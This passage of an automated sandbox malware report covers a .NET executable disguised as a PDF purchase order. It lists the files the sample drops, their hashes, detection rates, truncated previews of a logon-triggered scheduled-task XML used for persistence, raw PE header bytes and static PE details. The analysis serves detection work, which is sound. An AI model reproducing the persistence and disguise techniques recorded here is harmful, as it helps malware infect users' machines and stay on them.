                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.380747059108785
                              Encrypted:false
                              SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                              MD5:4D3B8C97355CF67072ABECB12613F72B
                              SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                              SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                              SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                              Malicious:false
                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aolatbuv.zf4.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsbvj1y4.lpd.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvlmnsfm.y1i.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kllndhzy.o0n.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moykrvrc.qce.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zk3oli14.52y.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpr3r03m.arw.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxxwey3h.1j0.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\tmp26DE.tmp

                              Download File
                              Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.084824819183175
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewnv:HeLwYrFdOFzOz6dKrsuqM
                              MD5:0424C6BB2ACE8FEA2FA428FC388395FD
                              SHA1:6FAFE9DBE4F08F2C467AF00692738A15798E8C02
                              SHA-256:CB29F61E35278D5B145E74829E35368CA03DE2CCE013A380A7C2D035BF75323C
                              SHA-512:D54D3B47898E4465D5A3EEE4EE9B25F6AC73B6160C907DFCA5795CEA1DDD89DFB8D15F8805F87AA833BF75DAE05A9CB69ED07276B368D330F9FDA8458A44CF76
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                              C:\Users\user\AppData\Local\Temp\tmp675.tmp

                              Download File
                              Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.084824819183175
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewnv:HeLwYrFdOFzOz6dKrsuqM
                              MD5:0424C6BB2ACE8FEA2FA428FC388395FD
                              SHA1:6FAFE9DBE4F08F2C467AF00692738A15798E8C02
                              SHA-256:CB29F61E35278D5B145E74829E35368CA03DE2CCE013A380A7C2D035BF75323C
                              SHA-512:D54D3B47898E4465D5A3EEE4EE9B25F6AC73B6160C907DFCA5795CEA1DDD89DFB8D15F8805F87AA833BF75DAE05A9CB69ED07276B368D330F9FDA8458A44CF76
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                              C:\Users\user\AppData\Local\Temp\tmpD40B.tmp

                              Download File
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.084824819183175
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewnv:HeLwYrFdOFzOz6dKrsuqM
                              MD5:0424C6BB2ACE8FEA2FA428FC388395FD
                              SHA1:6FAFE9DBE4F08F2C467AF00692738A15798E8C02
                              SHA-256:CB29F61E35278D5B145E74829E35368CA03DE2CCE013A380A7C2D035BF75323C
                              SHA-512:D54D3B47898E4465D5A3EEE4EE9B25F6AC73B6160C907DFCA5795CEA1DDD89DFB8D15F8805F87AA833BF75DAE05A9CB69ED07276B368D330F9FDA8458A44CF76
                              Malicious:true
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                              C:\Users\user\AppData\Local\Temp\tmpEC46.tmp

                              Download File
                              Process:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.084824819183175
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewnv:HeLwYrFdOFzOz6dKrsuqM
                              MD5:0424C6BB2ACE8FEA2FA428FC388395FD
                              SHA1:6FAFE9DBE4F08F2C467AF00692738A15798E8C02
                              SHA-256:CB29F61E35278D5B145E74829E35368CA03DE2CCE013A380A7C2D035BF75323C
                              SHA-512:D54D3B47898E4465D5A3EEE4EE9B25F6AC73B6160C907DFCA5795CEA1DDD89DFB8D15F8805F87AA833BF75DAE05A9CB69ED07276B368D330F9FDA8458A44CF76
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                              C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe

                              Download File
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):685568
                              Entropy (8bit):7.807300447482996
                              Encrypted:false
                              SSDEEP:12288:3dPwqNxtOB37QmJauif0txmkuhIak+eBn7Hxz0Kt0rAt7HclhUhlru4TscPm:6OW37QVf0PRu9Qndz0hAtTclhUhldsc+
                              MD5:5D5B5ECC06B9058D0EC3199ED8617CFE
                              SHA1:CBB1A95878E8A7A4AC09270A6DC7699C78996E28
                              SHA-256:0A58B574CCFB2898C4EE47A8DAB29174C2193731573D4578B7B5FF83AD1196D6
                              SHA-512:9044D553F7CE2E00FB15BD718065C6BA1E94162B74DFDE65A69EE472712866B287CCD26B52777D744EDC34B2C2FA465645CB99F3B45DA1E544F122ACB372CA37
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..j............... ........@.. ....................................@.................................;...O.......t...........................(d..T............................................ ............... ..H............text....i... ...j.................. ..`.rsrc...t............l..............@..@.reloc...............t..............@..B................o.......H.......`t..`P......(.......h...........................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0..!........(....rC..p~....o......t.....+..*....0..!........(....rI..p~....o......t.....+..*....0...........~.....+..*".(.....*Vs....(....t.........*...0..`........s....}.....s....}.....rS..p}.....rS..p}.....s....}.....s....}......}......}.....( ......($....*.0..i..........o!.....(......(..

                              C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                              Download File
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):685568
                              Entropy (8bit):7.807300447482996
                              Encrypted:false
                              SSDEEP:12288:3dPwqNxtOB37QmJauif0txmkuhIak+eBn7Hxz0Kt0rAt7HclhUhlru4TscPm:6OW37QVf0PRu9Qndz0hAtTclhUhldsc+
                              MD5:5D5B5ECC06B9058D0EC3199ED8617CFE
                              SHA1:CBB1A95878E8A7A4AC09270A6DC7699C78996E28
                              SHA-256:0A58B574CCFB2898C4EE47A8DAB29174C2193731573D4578B7B5FF83AD1196D6
                              SHA-512:9044D553F7CE2E00FB15BD718065C6BA1E94162B74DFDE65A69EE472712866B287CCD26B52777D744EDC34B2C2FA465645CB99F3B45DA1E544F122ACB372CA37
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..j............... ........@.. ....................................@.................................;...O.......t...........................(d..T............................................ ............... ..H............text....i... ...j.................. ..`.rsrc...t............l..............@..@.reloc...............t..............@..B................o.......H.......`t..`P......(.......h...........................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0..!........(....rC..p~....o......t.....+..*....0..!........(....rI..p~....o......t.....+..*....0...........~.....+..*".(.....*Vs....(....t.........*...0..`........s....}.....s....}.....rS..p}.....rS..p}.....s....}.....s....}......}......}.....( ......($....*.0..i..........o!.....(......(..

                              C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.807300447482996
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:z38PO_20248099-1_pdf.exe
                              File size:685'568 bytes
                              MD5:5d5b5ecc06b9058d0ec3199ed8617cfe
                              SHA1:cbb1a95878e8a7a4ac09270a6dc7699c78996e28
                              SHA256:0a58b574ccfb2898c4ee47a8dab29174c2193731573d4578b7b5ff83ad1196d6
                              SHA512:9044d553f7ce2e00fb15bd718065c6ba1e94162b74dfde65a69ee472712866b287ccd26b52777d744edc34b2c2fa465645cb99f3b45da1e544f122acb372ca37
                              SSDEEP:12288:3dPwqNxtOB37QmJauif0txmkuhIak+eBn7Hxz0Kt0rAt7HclhUhlru4TscPm:6OW37QVf0PRu9Qndz0hAtTclhUhldsc+
                              TLSH:62E41225321ADB12D0A60BB210B2D2B41BB59E9D2402D3038EEF7EFF797679156817D3
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..j............... ........@.. ....................................@................................

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x4a898e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F11FEC [Mon Sep 23 07:59:40 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa893b0x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x674.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xa64280x54.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xa69940xa6a00045c22e41300f948252472d761023d08False0.9178266246249063data7.8170394032595425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0xaa0000x6740x800dc1bb465dc7c5cc3c2b68f490aac9b70False0.3427734375data3.5397571549190485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xac0000xc0x20023607fd5c69ca257467b834002b79656False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0xaa0900x3e4data0.39558232931726905
                              RT_MANIFEST0xaa4840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

